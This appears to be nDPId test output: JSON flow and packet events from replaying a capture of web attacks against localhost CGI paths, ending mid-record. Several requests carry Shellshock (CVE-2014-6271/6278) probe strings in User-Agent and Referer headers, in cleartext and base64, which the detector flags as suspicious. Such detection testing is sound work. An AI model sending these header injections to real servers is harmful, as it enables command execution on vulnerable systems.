+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_packet_id":1,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277438,"pkt":"AAAAAAAAAAAAAAAACABFAAEJhwhAAEAGtOR\/AAABfwAAAcVUH5Cc4b\/Kjk5kuIAYAED+\/QAAAQEICp1m\/eadZv3mR0VUIC9wcmludGVudiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277438,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/printenv","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":1,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277439,"pkt":"AAAAAAAAAAAAAAAACABFAAETyIlAAEAGc1l\/AAABfwAAAcVWH5DyzvBYc36tz4AYAED\/BwAAAQEICp1m\/eedZv3nR0VUIC9yZXN0b3JlX2NvbmZpZy5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="} 
+01174{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":478,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7560000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"flow_avg_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277439,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/restore_config.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00765{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277442,"pkt":"AAAAAAAAAAAAAAAACABFAAEICV1AAEAGMpF\/AAABfwAAAcVYH5Aa\/jGM\/2VZ0IAYAED+\/AAAAQEICp1m\/eqdZv3pR0VUIC9ydWJ5LnJiIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01163{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277442,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ruby.rb","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277443,"pkt":"AAAAAAAAAAAAAAAACABFAAEH1YJAAEAGZmx\/AAABfwAAAcVaH5CqXO1RjdaXCYAYAED++wAAAQEICp1m\/eudZv3rR0VUIC9zZWFyY2ggSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277443,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277444,"pkt":"AAAAAAAAAAAAAAAACABFAAELsxNAAEAGiNd\/AAABfwAAAcVcH5B0n4vBZle5N4AYAED+\/wAAAQEICp1m\/eydZv3sR0VUIC9zZWFyY2guY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277444,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/search.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277446,"pkt":"AAAAAAAAAAAAAAAACABFAAELQstAAEAG+R9\/AAABfwAAAcVeH5AckXoZTNNhQ4AYAED+\/wAAAQEICp1m\/e6dZv3uR0VUIC9zZXJ2ZXIucGhwIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KDQo="} +01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":482,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277446,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/server.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1576420277448,"pkt":"AAAAAAAAAAAAAAAACABFAAEHr2pAAEAGjIR\/AAABfwAAAcVgH5ABL5e76\/gzuYAYAED++wAAAQEICp1m\/fCdZv3wR0VUIC9zdGF0dXMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7560000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"flow_avg_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420277448,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/status","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1576420277449,"pkt":"AAAAAAAAAAAAAAAACABFAAELeuBAAEAGwQp\/AAABfwAAAcViH5Bf0UINj\/XlzYAYAED+\/wAAAQEICp1m\/fGdZv3xR0VUIC9zeXNpbmZvLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
+01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7560000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420277449,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sysinfo.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277451,"pkt":"AAAAAAAAAAAAAAAACABFAAEFPsFAAEAG\/S9\/AAABfwAAAcVkH5CmDwZuBlGlyYAYAED++QAAAQEICp1m\/fOdZv3zR0VUIC90ZXN0IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7560000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277451,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"thread_ts_msec":1576420277452,"pkt":"AAAAAAAAAAAAAAAACABFAAEJ+UlAAEAGQqN\/AAABfwAAAcVmH5C1jMGV60p+W4AYAED+\/QAAAQEICp1m\/fSdZv30R0VUIC90ZXN0LWNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7560000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420277452,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 
